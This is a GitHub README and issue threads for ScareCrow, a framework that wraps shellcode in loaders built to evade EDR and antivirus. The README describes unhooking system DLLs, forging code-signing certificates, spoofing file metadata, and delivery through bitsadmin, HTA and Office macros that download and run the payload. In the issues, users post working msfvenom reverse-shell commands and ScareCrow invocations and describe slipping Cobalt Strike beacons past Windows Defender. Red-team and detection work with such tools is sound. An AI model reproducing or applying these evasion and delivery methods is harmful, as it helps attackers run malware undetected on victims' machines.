ScareCrow - Payload creation framework designed around EDR bypass.

Overview



ScareCrow

More Information

If you want to learn more about the techniques utlized in this framework please take a look at Part 1 and Part 2

Description

ScareCrow is a payload creation framework for generating loaders for the use of side loading (not injection) into a legitimate Windows process (bypassing Application Whitelisting controls). Once the DLL loader is loaded into memory, utilizing a technique to flush an EDR’s hook out the system DLLs running in the process's memory. This works because we know the EDR’s hooks are placed when a process is spawned. ScareCrow can target these DLLs and manipulate them in memory by using the API function VirtualProtect, which changes a section of a process’ memory permissions to a different value, specifically from Execute–Read to Read-Write-Execute.

When executed, ScareCrow will copy the bytes of the system DLLs stored on disk in C:\Windows\System32\. These DLLs are stored on disk “clean” of EDR hooks because they are used by the system to load an unaltered copy into a new process when it’s spawned. Since EDR’s only hook these processes in memory, they remain unaltered. ScareCrow does not copy the entire DLL file, instead only focuses on the .text section of the DLLs. This section of a DLL contains the executable assembly, and by doing this ScareCrow helps reduce the likelihood of detection as re-reading entire files can cause an EDR to detect that there is a modification to a system resource. The data is then copied into the right region of memory by using each function’s offset. Each function has an offset which denotes the exact number of bytes from the base address where they reside, providing the function’s location on the stack. In order to do this, ScareCrow changes the permissions of the .text region of memory using VirtualProtect. Even though this is a system DLL, since it has been loaded into our process (that we control), we can change the memory permissions without requiring elevated privileges.

Once these the hooks are removed, ScareCrow then utilizes custom System Calls to load and run shellcode in memory. ScareCrow does this even after the EDR hooks are removed to help avoid being detected by non-userland hooked-based telemetry gathering tools such as Event Tracing for Windows (ETW) or other event logging mechanisms. These custom system calls are also used to perform the VirtualProtect call to remove the hooks placed by EDRs, described above, to avoid being detected an any EDR’s anti-tamper controls. This is done by calling a custom version of the VirtualProtect syscall, NtProtectVirtualMemory. ScareCrow utilizes Golang to generate these loaders and then assembly for these custom syscall functions.

ScareCrow loads the shellcode into memory by first decrypting the shellcode, which is encrypted by default using AES encryption with a decryption and initialisation vector key. Once decrypted and loaded, the shellcode is then executed. Depending on the loader options specified ScareCrow will set up different export functions for the DLL. The loaded DLL also does not contain the standard DLLmain function which all DLLs typically need to operate. The DLL will still execute without an issue because the process we load into will look for those export functions and not worry about DLLMain being there.

Binary Sample

After

During the creation process of the loader, ScareCrow utilizes a library for blending into the background after a beacon calls home. This library does two things:

  • Code signs the Loader: Files that are signed with code signing certificates are often put under less scrutiny, making it easier to be executed without being challenged, as files signed by a trusted name are often less suspicious than others. Most antimalware products don’t have the time to validate and verify these certificates (now some do but typically the common vendor names are included in a whitelist) ScareCrow creates these certificates by using a go package version of the tool limelighter to create a pfx12 file. This package takes an inputted domain name, specified by the user, to create a code signing certificate for that domain. If needed, you can also use your own code signing certificate if you have one, using the valid command-line option.
  • Spoof the attributes of the loader: This is done by using syso files which are a form of embedded resource files that when compiled along with our loader, will modify the attribute portions of our compiled code. Prior to generating a syso file, ScareCrow will generate a random file name (based on the loader type) to use. Once chosen this file name will map to the associated attributes for that file name, ensuring that the right values are assigned.

File Attribute Sample

With these files and the go code, ScareCrow will cross compile them into DLLs using the c-shared library option. Once the DLL is compiled, it is obfuscated into a broken base64 string that will be embedded into a file. This allows for the file to be remotely pulled, accessed, and programmatically executed.

Install

The first step as always is to clone the repo. Before you compile ScareCrow you'll need to install the dependencies.

To install them, run following commands:

go get github.com/fatih/color
go get github.com/yeka/zip
go get github.com/josephspurrier/goversioninfo

Make sure that the following are installed on your OS:

openssl
osslsigncode
mingw-w64

Then build it

go build ScareCrow.go

Help


./ScareCrow -h
 
  _________                           _________                       
 /   _____/ ____ _____ _______   ____ \_   ___ \_______  ______  _  __
 \_____  \_/ ___\\__  \\_  __ \_/ __ \/    \  \/\_  __ \/  _ \ \/ \/ /
 /        \  \___ / __ \|  | \/\  ___/\     \____|  | \(  <_> )     / 
/_______  /\___  >____  /__|    \___  >\______  /|__|   \____/ \/\_/  
        \/     \/     \/            \/        \/                      
                                                        (@Tyl0us)
        “Fear, you must understand is more than a mere obstacle. 
        Fear is a TEACHER. the first one you ever had.”

Usage of ./ScareCrow:
  -I string
        Path to the raw 64-bit shellcode.
  -Loader string
        Sets the type of process that will sideload the malicious payload:
        [*] binary - Generates a binary based payload. (This type does not benfit from any sideloading)
        [*] control - Loads a hidden control applet - the process name would be rundll32.
        [*] dll - Generates just a DLL file. Can executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
        [*] excel - Loads into a hidden Excel process.
        [*] wscript - Loads into WScript process.
         (default "dll")
  -O string
        Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.
  -console
        Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
  -delivery string
        Generates a one-liner command to download and execute the payload remotely:
        [*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader.
        [*] hta - Generates a blank hta file containing the loader along with a MSHTA command to execute the loader remotely in the background.
        [*] macro - Generates an Office macro that will download and execute the loader remotely.
  -domain string
        The domain name to use for creating a fake code signing cert. (e.g. Acme.com) 
  -password string
        The password for code signing cert. Required when -valid is used.
  -sandbox string
        Enables sandbox evasion using IsDomainedJoined calls.
  -url string
        URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/)
  -valid string
        The path to a valid code signing cert. Used instead of -domain if a valid code signing cert is desired.

Loader

The Loader determines the type of technique to load the shellcode into the target system. If no Loader option is chosen, ScareCrow will just compile a standard DLL file, that can be used by rundll32, regsvr32, or other techniques that utilize a DLL. ScareCrow utilizes three different types of loaders to load shellcode into memory:

  • Control Panel – This generates a control panel applet (I.E Program and Features, or AutoPlay). By compiling the loader to have specific DLL export functions in combination with a file extension .cpl, it will spawn a control panel process (rundll32.exe) and the loader will be loaded into memory.
  • WScript – Spawns a WScript process that utilizes a manifest file and registration-free Com techniques to the side-by-side load (not injected) DLL loader into its own process. This avoids registering the DLL in memory as the manifest file tells the process which, where, and what version of a DLL to load.
  • Excel – Generates an XLL file which are Excel-based DLL files that when loaded into Excel will execute the loader. A hidden Excel process will be spawned, forcing the XLL file to be loaded.

ScareCrow also can generate binary based payloads if needed by using the -loader command line option. These binaries do not benefit from any side-by-side loading techniques but serve as an additional technique to execute shellcode depending on the situation.

Console

ScareCrow utilizes a technique to first create the process and then move it into the background. This does two things, first it helps keeps the process hidden and second, avoids being detected by any EDR product. Spawning a process right away in the background can be very suspiciousness and an indicator of maliciousness. ScareCrow does this by calling the ‘GetConsoleWindow’ and ‘ShowWindow’ Windows function after the process is created and the EDR’s hooks are loaded, and then changes the windows attributes to hidden. ScareCrow utilizes these APIs rather than using the traditional -ldflags -H=windowsgui as this is highly signatured and classified in most security products as an Indicator of Compromise.

If the -console command-line option is selected, ScareCrow will not hide the process in the background. Instead, ScareCrow will add several debug messages displaying what the loader is doing.

Delivery

The deliver command line argument allows you to generate a command or string of code (in the macro case) to remotely pull the file from a remote source to the victim’s host. These delivery methods include:

  • Bits – This will generate a bitsadmin command that while download the loader remotely, execute it and remove it.
  • HTA – This will generate a blank HTA file containing the loader. This option will also provide a command line that will execute the HTA remotely.
  • Macro – This will generate an Office macro that can be put into an Excel or Word macro document. When this macro is executed, the loader will be downloaded from a remote source and executed, and then removed.

To Do

  • Currently only supports x64 payloads
  • Some older versions of Window's OS (i.e Windows 7 or Windows 8.1), have issues reloading the systems DLLs, as a result a verison check is built in to ensure stability

Credit

  • Special thanks to the artist, Luciano Buonamici for the artwork
  • Special thanks to josephspurrier for his repo
Comments
  • Error during payload compiling and after that during signing of a binary

    Error during payload compiling and after that during signing of a binary

    Hi. Thank you for your great work! I am trying to get a Cobalt Strike beacon.exe thru Windows Defender but currently I get the two errors below. I attempt this on Kali 2021.3 in a virtual environment using version 2.3 of ScareCrow.

    ┌──(virtual_env_scarecrow)─(root💀kali)-[~/pentest/ScareCrow-2.3] └─# ./ScareCrow -I beacon.exe -domain www.microsoft.com -injection "C:\Windows\System32\notepad.exe" -console

    [*] Encrypting Shellcode Using AES Encryption [+] Shellcode Encrypted [+] Process Injection Mode Enabled [*] Created Process: C:\Windows\System32\notepad.exe [*] Creating an Embedded Resource File [+] Created Embedded Resource File With OneDrive's Properties [*] Compiling Payload exit status 2: # loader ./OneDrive.go:367:67: newline in string ./OneDrive.go:367:67: syntax error: unexpected newline, expecting comma or ) ./OneDrive.go:2682:3: newline in string

    [+] Payload Compiled [*] Signing OneDrive.exe With a Fake Cert 2021/09/22 04:06:42 cmd.Run() failed with exit status 255

    opened by jsdhasfeds 24
  • Binary loader not working with Donut shellcode

    Binary loader not working with Donut shellcode

    I am generating shellcode with donut, specifying x64. The CPL loader works as expected, but the binary loader does not: output

    The shellcode is being generated from Atlas, a .NET implant, if that makes a difference. Could this be related to https://github.com/optiv/ScareCrow/issues/7?

    opened by kyleavery 22
  • DLL Refresher detection

    DLL Refresher detection

    Hello,

    thank you for providing such a great framework! Amazing work.

    Unfortunately, the DLL Refresher code is detected by some AV, for example: NOD32. Example command:

    ../ScareCrow/ScareCrow -I beacon-sourcepoint-test1.bin -Loader dll -etw -domain www.microsoft.com

    When I disabled refreshing and ETW, the DLL bypasses NOD32 though. I tried modifying the Struct.go, but editing is pretty hard due to "variable set and unused" compilation error.

    Any chance that you can implement ETW and Refresher functionality as reflected (encrypted) DLL files? My Goland skills cannot do that in this language :(

    thanks Rafal

    opened by 0xElessar 13
  • Newb payload generation/evasion question

    Newb payload generation/evasion question

    Hello!

    I'm finding that Windows Defender is gobbling each and every payload I throw from ScareCrow at it, and it feels like I'm doing something wrong. Hope you could sanity check my process? Fair warning: I'm not new to pentesting but new to Cobalt Strike and not very experienced with EDR bypass techniques. In fact, seeing this video on ScareCrow is what inspired me to finally buy Cobalt Strike!

    Anyways, I start in Cobalt Strike:

    1. Attacks > Packages > Payload Generator > picked my listener > chose output of "raw" > ticked the box for "Use x64 payload" > saved that to ScareCrow folder on Kali VM. I also tried Attacks > Packages > Windows Executable (S) to get the export as well.

    2. From Kali VM, tried generating a variety of payloads from Scarecrow. They generate successfully with no errors.

    3. From my Win 10 19041 box, tried firing the payloads in several ways (drag and drop directly to disk, fire with msbuild, fire with PowerShell, fire with rundll32, etc.) and Windows Defender happily gobbles them up.

    I thought maybe it was just Defender getting wise to some of ScareCrow's shenanigans, but it looks like folks have no problem fooling Defender - at least as of this very recent blog post that I saw someone tweet.

    Any ideas?

    Thanks! Brian

    opened by 7MinSec 13
  • Delivery HTA with Loaders Control or Wscript not working

    Delivery HTA with Loaders Control or Wscript not working

    Bin file: Stageless -> msfvenom -p windows/x64/meterpreter_reverse_tcp EXE files are deleted on download by EDRs. But for HTA deliveries, A reverse shell isn't happening.

    Commands ran: ./ScareCrow -I new64.bin -domain microsoft.com -delivery hta -url http://10.0.0.12:8000 -Loader control -O testhta.hta ./ScareCrow -I new64.bin -domain microsoft.com -delivery hta -url http://10.0.0.12:8000 -Loader control -O jstest.js ./ScareCrow -I new64.bin -domain microsoft.com -delivery hta -url http://10.0.0.12:8000 -Loader wscript -O jstest.js

    None of them are giving back a reverse shell.

    opened by Vyiel 12
  • Binary and dll payloads not working

    Binary and dll payloads not working

    Binary and dll payloads are not working with Covenant (that uses donut to generate shellcode).

    The control .cpl payload works but it is flagged by 6 AVs, I was modifying the code base for ages tying to find the signatures, but it's a large code base.

    Any ideas which bits of the code they are flagging? I noticed that random names are generated for every function and variable name in the Cryptor.

    I tried running the dll payload with: rundll32 example.dll

    opened by Simon-Davies 10
  • Binary crashes after overwriting pointer

    Binary crashes after overwriting pointer

    The first error seems to be an access denied (0xc0000005)

    ./ScareCrow -I ~/Desktop/Payloads/payload.bin -console -domain www.microsoft.com

    Example one

    OneDrive.exe [DEBUG] [+] Detected Version: 10.0 [DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll [DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll [DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll [DEBUG] [+] EDR removed [DEBUG] [*] Create a Pointer on stack [DEBUG] [*] Loading shellcode into a string [DEBUG] [*] Copy Pointer's attributes [DEBUG] [*] Overwriten Pointer to point to shellcode String Exception 0xc0000005 0x0 0x1af93eea000 0xc00009c000 PC=0xc00009c000

    syscall.Syscall(0xc00009c000, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0) runtime/syscall_windows.go:188 +0xe9 main.main() loader/OneDrive.go:202 +0x665 rax 0xc00009c000 rbx 0x10b0920 rcx 0x0 rdi 0xef93e4e000 rsi 0xc00010fe40 rbp 0xc00010fde0 rsp 0xef941ffb88 r8 0x0 r9 0x0 r10 0x0 r11 0x206 r12 0xffffffffffffffff r13 0x3e r14 0x3d r15 0xaa rip 0xc00009c000 rflags 0x10297 cs 0x33 fs 0x53 gs 0x2b

    Example two - ran as administrator to see if the problem went away

    cmd [DEBUG] [+] Detected Version: 10.0 [DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll [DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll [DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll [DEBUG] [+] EDR removed [DEBUG] [*] Create a Pointer on stack [DEBUG] [*] Loading shellcode into a string [DEBUG] [*] Copy Pointer's attributes [DEBUG] [*] Overwriten Pointer to point to shellcode String Exception 0xc0000005 0x0 0x196c2d26000 0xc000068000 PC=0xc000068000

    syscall.Syscall(0xc000068000, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0) runtime/syscall_windows.go:188 +0xe9 main.main() loader/cmd.go:202 +0x658 rax 0xc000068000 rbx 0xf40920 rcx 0x0 rdi 0xd6c2cbe000 rsi 0xc0000c9e40 rbp 0xc0000c9de0 rsp 0xd6c2fff7e8 r8 0x0 r9 0x0 r10 0x0 r11 0x206 r12 0xffffffffffffffff r13 0x3d r14 0x3c r15 0xaa rip 0xc000068000 rflags 0x10297 cs 0x33 fs 0x53 gs 0x2b

    This appears to have been raised in #7 but I am using the latest version (I believe - I don't see a version number in the output) cloned today (18/03)

    opened by t3hbb 10
  • Excel loader not working

    Excel loader not working

    Hi again,

    as I played around with this great tool a little more, I found I could not get the Excel loader module to work. I tried to create shellcode in two ways:

    msfvenom -p windows/x64/shell_bind_tcp LPORT=8888 -o msf.bin -f raw
    
    msfvenom -p windows/x64/meterpreter_bind_tcp LPORT=8888 -o msf.bin -f raw
    

    Both worked flawlessly with other loaders (except the binary one).

    When I create the payload via Excel loader module, I try to execute it via cscript as I saw a JavaScript file gets created. Excel spawns with a unsafe file extension message but does not execute the resulting xll.

    I saw the xll got created in AppData\temp so I copied it before closing Excel and tried to execute the DLL manually by the methods described in this gist:

    https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52

    Unfortunately none of them worked.

    Windows version here is

    Version 20H2 (OS Build 19042.746)
    

    Excel version is:

    Office Professional Plus 2019
    Version 2102
    

    No AVs are installed and Defender is turned off completely for testing here.

    opened by 0xShkk 10
  • How to create valid payloads?

    How to create valid payloads?

    I would like to thank you for providing such an complete framework and the research details at first!

    Unfortunately, I was not able to create valid payloads with ScareCrow so far. As an example, I tried the shellcode creation via msfvenom first:

    msfvenom -p windows/x64/shell/bind_tcp LPORT=8888 -f raw -o ./Desktop/scarecrow-test/bind.bin -b '\x00'
    

    or

    msfvenom -p windows/x64/shell/bind_tcp LPORT=8888 EXITFUNC=thread -f raw -o ./Desktop/scarecrow-test/bind.bin -b '\x00'
    

    Then I tried to use ScareCrow on it:

    ./ScareCrow -I ../bind.bin -Loader binary -domain microsoft.com -console
    

    which succeeds in creating a binary loader. But the resulting exe is not working on an Windows box. The resulting debug output in console is:

    [DEBUG] [+] Detected Version: 10.0
    [DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
    [DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
    [DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
    [DEBUG] [+] EDR removed
    [DEBUG] [*] Create a Pointer on stack
    [DEBUG] [*] Loading shellcode into a string
    [DEBUG] [*] Copy Pointer's attributes
    [DEBUG] [*] Overwriten Pointer to point to shellcode String
    Exception 0xc0000005 0x0 0xda29d2b000 0xc000128000
    PC=0xc000128000
    
    runtime: unknown pc 0xc000128000
    stack: frame={sp:0xc000119e30, fp:0x0} stack=[0xc000112000,0xc00011a000)
    000000c000119d30:  0000000000000001  000000c000119d60
    000000c000119d40:  000000000066bb98 <fmt.(*pp).free+184>  0100000000777000
    000000c000119d50:  000001e7e9b993b0  0000000000000000
    000000c000119d60:  0000000000000028  000001e7e9b907b0
    000000c000119d70:  000000c00000aae0  000000c000082120
    000000c000119d80:  000000000077f660  0000000000000000
    000000c000119d90:  0000000000000000  00000000006e5280
    000000c000119da0:  ffffffffffffffff  000000c000094500
    000000c000119db0:  000000c000119ed8  0000000000000040
    000000c000119dc0:  000000c000119e90  000000000069f180
    000000c000119dd0:  000000000068e401 <main.printDebug+33>  000000c00000aae0
    000000c000119de0:  0000000000000050  000000000068f7ce <main.NtProtectVirtualMemory+142>
    000000c000119df0:  0000000000690050  000000c00000aae0
    000000c000119e00:  0000000000000005  0000000000000005
    000000c000119e10:  0000000000000000  0000000000000000
    000000c000119e20:  000000c0000fcde0  000000c000119f78
    000000c000119e30: <000000000068f2d9 <main.main+1593>  00000000006c0050
    000000c000119e40:  ffffffffffffffff  000000c000094500
    000000c000119e50:  000000c000119ed8  0000000000000040
    000000c000119e60:  000000c000119e90  0000000000000000
    000000c000119e70:  0000000000000000  000000c0000fcde0
    000000c000119e80:  0000000000000002  0000000000000400
    000000c000119e90:  0000000000000004  0000000000000540
    000000c000119ea0:  0000000000000010  0000000000000012
    000000c000119eb0:  0000000000000540  00000000000003e6
    000000c000119ec0:  00000000006e5c20  0000000000000020
    000000c000119ed0:  0000000000000021  0000000000002000
    000000c000119ee0:  000000c0000fc990  000000c0000c5f18
    000000c000119ef0:  000000000068e2ee <golang.org/x/sys/windows/registry.init+686>  000000c0000fc810
    000000c000119f00:  00000000006c2647  0000000000000019
    000000c000119f10:  000000c0000fc990  000000c0000c5f48
    000000c000119f20:  000000c000094500  000000c000128800
    runtime: unknown pc 0xc000128000
    stack: frame={sp:0xc000119e30, fp:0x0} stack=[0xc000112000,0xc00011a000)
    000000c000119d30:  0000000000000001  000000c000119d60
    000000c000119d40:  000000000066bb98 <fmt.(*pp).free+184>  0100000000777000
    000000c000119d50:  000001e7e9b993b0  0000000000000000
    000000c000119d60:  0000000000000028  000001e7e9b907b0
    000000c000119d70:  000000c00000aae0  000000c000082120
    000000c000119d80:  000000000077f660  0000000000000000
    000000c000119d90:  0000000000000000  00000000006e5280
    000000c000119da0:  ffffffffffffffff  000000c000094500
    000000c000119db0:  000000c000119ed8  0000000000000040
    000000c000119dc0:  000000c000119e90  000000000069f180
    000000c000119dd0:  000000000068e401 <main.printDebug+33>  000000c00000aae0
    000000c000119de0:  0000000000000050  000000000068f7ce <main.NtProtectVirtualMemory+142>
    000000c000119df0:  0000000000690050  000000c00000aae0
    000000c000119e00:  0000000000000005  0000000000000005
    000000c000119e10:  0000000000000000  0000000000000000
    000000c000119e20:  000000c0000fcde0  000000c000119f78
    000000c000119e30: <000000000068f2d9 <main.main+1593>  00000000006c0050
    000000c000119e40:  ffffffffffffffff  000000c000094500
    000000c000119e50:  000000c000119ed8  0000000000000040
    000000c000119e60:  000000c000119e90  0000000000000000
    000000c000119e70:  0000000000000000  000000c0000fcde0
    000000c000119e80:  0000000000000002  0000000000000400
    000000c000119e90:  0000000000000004  0000000000000540
    000000c000119ea0:  0000000000000010  0000000000000012
    000000c000119eb0:  0000000000000540  00000000000003e6
    000000c000119ec0:  00000000006e5c20  0000000000000020
    000000c000119ed0:  0000000000000021  0000000000002000
    000000c000119ee0:  000000c0000fc990  000000c0000c5f18
    000000c000119ef0:  000000000068e2ee <golang.org/x/sys/windows/registry.init+686>  000000c0000fc810
    000000c000119f00:  00000000006c2647  0000000000000019
    000000c000119f10:  000000c0000fc990  000000c0000c5f48
    000000c000119f20:  000000c000094500  000000c000128800
    rax     0xc000128000
    rbx     0x0
    rcx     0xc0000fcde0
    rdi     0x1a29c03000
    rsi     0xc000119da0
    rbp     0xc000119f78
    rsp     0xc000119e30
    r8      0xc000119d98
    r9      0xc000119e28
    r10     0x0
    r11     0x212
    r12     0xffffffffffffffff
    r13     0x3b
    r14     0x3a
    r15     0xaa
    rip     0xc000128000
    rflags  0x10246
    cs      0x33
    fs      0x53
    gs      0x2b
    

    I also tried to use Donut to create a x64 shellcode of an existing binary, as well as using dll as a Loader for ScareCrow for both generated shellcodes (msf and donut). Nothing worked so far for me.

    Can you please give me more details on what kind of shellcode payload ScareCrow expects? Maybe provide some examples in the documentation?

    Many thanks

    opened by 0xShkk 10
  • idk what id happening

    idk what id happening

    hey, thanks for anyone contributing in this repository, i have a small problem though, well , i wanted to test this code, so i generated my shellcode: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.16.108 LPORT=4444 -f raw -o /home/kali/ScareCrow/payload.bin

    then, i typed this: ./ScareCrow -I payload.bin -etw -domain www.microsoft.com

    Screenshot

    it did work and everything, the expected result, however when i set up my msf listener, and executed the Outlook file on widows 10, it didnt work (i mean no shell was created)

    so what is the problem ?

    and can u add some more documentation :)

    opened by ORCA666 9
  • HTA delivery failing with remote URL

    HTA delivery failing with remote URL

    When executing the HTA delivery file (for both control and excel loaders) passing a remote URL where the HTA file is hosted does nothing. On the other hand, if the HTA file is already located on disk, the shellcode is executed successfully.

    Monitoring through Process Explorer for control, you can see that control.exe is spawned which then calls rundll32.exe. This never happens when a remote URL is passed instead.

    HTA file generated via: /opt/ScareCrow/ScareCrow -I raw_shell.bin -Loader control -O loader.hta -delivery hta -url <url> -domain <domain> OR /opt/ScareCrow/ScareCrow -I raw_shell.bin -Loader excel -O loader.hta -delivery hta -url <url> -domain <domain>

    Control/Excel Loader executed via: mshta.exe http://HOST/loader.hta --> does not work mshta.exe C:\Windows\Tasks\loader.hta --> works

    opened by zyk11 8
  • Scarecrow not working with Mythic C2/atlas agent

    Scarecrow not working with Mythic C2/atlas agent

    Hello, During testing of C2 frameworks and scarecrow I ran across interesting behavior when it came to the Mythic C2 atlas agent (https://github.com/MythicAgents/atlas)

    When exporting an atlas agent executable, using donut to generate shellcode and then using scarecrow the new wrapped payload is successfully created. When executed this payload makes 1 callback to the C2 server and then ceases to run. I have tried a number of different combinations to attempt to understand the issue better:

    atlas + confuserEx + donut + scarecrow = 1 callback then dead atlas + donut + scarecrow = 1 callback then dead atlas + CLRvoyance + scarecrow = 1 callback then dead atlas + confuserEx + donut + DonutTest = working implant

    in addition I tried another dotnet c2 framework Covenant Grunt + confuserEx + donut + scarecrow = working implant.

    I have tried binary and control loaders and I have used the console and no errors are generated at any point. I'm happy to try and other troubleshooting that anyone might recommend.

    Thanks

    Investigating 
    opened by c0pp3r 11
Releases(v4.11)
Owner
Optiv Security
Optiv Security is a security solutions integrator that enables clients to reduce risk by taking a strategic approach to cybersecurity.
Optiv Security
Small program that takes in commands and moves one or more robots around the surface of Mars!

Mars Rover Build and Run the Image Build image from current directory: docker build -t marsrover . Run image interactively: docker run -i marsrover

Karl King 0 Jan 2, 2022
This is just a repository to play around with Generics and Fuzzing, two big things coming with go 1.18!

This is just a repository to play around with Generics and Fuzzing, two big things coming with go 1.18!

Christopher Smith 0 Feb 6, 2022
Wise-mars-rover - Write a program that takes in commands and moves one or more robots around the surface of Mars

wise-mars-rover Write a program that takes in commands and moves one or more rob

Daniel Churm 0 Feb 9, 2022
siusiu (suite-suite harmonics) a suite used to manage the suite, designed to free penetration testing engineers from learning and using various security tools, reducing the time and effort spent by penetration testing engineers on installing tools, remembering how to use tools.

siusiu (suite-suite harmonics) a suite used to manage the suite, designed to free penetration testing engineers from learning and using various security tools, reducing the time and effort spent by penetration testing engineers on installing tools, remembering how to use tools.

Re 296 Dec 12, 2022
End to end functional test and automation framework

Declarative end to end functional testing (endly) This library is compatible with Go 1.12+ Please refer to CHANGELOG.md if you encounter breaking chan

Viant, Inc 231 Jan 6, 2023
Golang HTTP client testing framework

flute Golang HTTP client testing framework Presentation https://speakerdeck.com/szksh/flute-golang-http-client-testing-framework Overview flute is the

Shunsuke Suzuki 17 Sep 27, 2022
API testing framework inspired by frisby-js

frisby REST API testing framework inspired by frisby-js, written in Go Proposals I'm starting to work on frisby again with the following ideas: Read s

_Hofstadter 274 Sep 27, 2022
http integration test framework

go-hit hit is an http integration test framework written in golang. It is designed to be flexible as possible, but to keep a simple to use interface f

Tobias Salzmann 157 Dec 29, 2022
Minimal and Beautiful Go testing framework

Goblin A Mocha like BDD testing framework written in Go that requires no additional dependencies. Requires no extensive documentation nor complicated

null 869 Dec 25, 2022
Testing framework for Go. Allows writing self-documenting tests/specifications, and executes them concurrently and safely isolated. [UNMAINTAINED]

GoSpec GoSpec is a BDD-style testing framework for the Go programming language. It allows writing self-documenting tests/specs, and executes them in p

Esko Luontola 113 Nov 28, 2022
GoMock is a mocking framework for the Go programming language.

gomock GoMock is a mocking framework for the Go programming language. It integrates well with Go's built-in testing package, but can be used in other

Go 8.3k Dec 28, 2022
A generic fuzzing and delta-debugging framework

Tavor Tavor (Sindarin for woodpecker) is a framework for easily implementing and using fuzzing and delta-debugging. Its EBNF-like notation allows you

Markus Zimmermann 241 Dec 18, 2022
🚀🌏 Orbital is a simple end-to-end testing framework for Go

Orbital is a test framework which enables a developer to write end to end tests just like one would writing unit tests. We do this by effectively copying the testing.T API and registering tests to be run periodically on a configured schedule.

Segment 79 Nov 18, 2022
An always-on framework that performs end-to-end functional network testing for reachability, latency, and packet loss

Arachne Arachne is a packet loss detection system and an underperforming path detection system. It provides fast and easy active end-to-end functional

Uber Open Source 370 Dec 31, 2022
BDD Testing Framework for Go

Jump to the docs | 中文文档 to learn more. To start rolling your Ginkgo tests now keep reading! If you have a question, comment, bug report, feature reque

Onsi Fakhouri 6.7k Jan 1, 2023
Framework of performance testing

Framework of performance testing fperf is a powerful and flexible framework which allows you to develop your own benchmark tools so much easy. You cre

null 338 Nov 30, 2022
Professional lightweight testing mini-framework for Go.

is Professional lightweight testing mini-framework for Go. Easy to write and read Beautifully simple API with everything you need: is.Equal, is.True,

Mat Ryer 1.5k Dec 28, 2022
Microservice Test Framework

This Microservice Test Framework (MTF) allows in simple way to mock service dependencies and setup docker test environment comprehensive.

Marek Smoliński 76 Nov 22, 2022
A clipboard-based mocking framework for Go that gets out of your way.

A clipboard-based mocking framework for Go that gets out of your way. This tool has been built with inspiration lovingly taken from Moq, and fuelled b

Roger Guldbrandsen 41 Nov 18, 2022